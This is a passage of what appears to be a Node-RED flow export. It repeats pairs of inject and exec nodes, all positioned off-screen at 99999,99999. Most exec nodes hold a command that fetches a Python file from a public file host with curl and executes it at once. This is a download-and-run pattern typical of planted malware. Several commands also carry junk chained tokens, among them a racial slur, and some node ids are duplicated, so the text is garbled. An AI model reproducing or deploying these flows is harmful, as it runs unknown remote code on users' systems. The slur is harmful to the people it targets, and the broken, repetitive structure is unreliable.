        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/4otep7.py && python3 4otep7.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/u3e0da.py && python3 u3e0da.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/g25bqb.py && python3 g25bqb.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/5km6ip.py && python3 5km6ip.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/i0pkst.py && python3 i0pkst.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O  && python3  && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/wr06pj.py && python3 wr06pj.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/98vfkg.py && python3 98vfkg.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/98vfkg.py && python3 98vfkg.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/98vfkg.py && python3 98vfkg.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/98vfkg.py && python3 98vfkg.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/98vfkg.py && python3 98vfkg.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/lbu18p.py && python3 lbu18p.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/98vfkg.py && python3 98vfkg.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/98vfkg.py && python3 98vfkg.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/98vfkg.py && python3 98vfkg.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/98vfkg.py && python3 98vfkg.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/tu12n6.py && python3 tu12n6.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/6ukc69.py && python3 6ukc69.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/ohvtzr.py && python3 ohvtzr.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O  && python3  && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
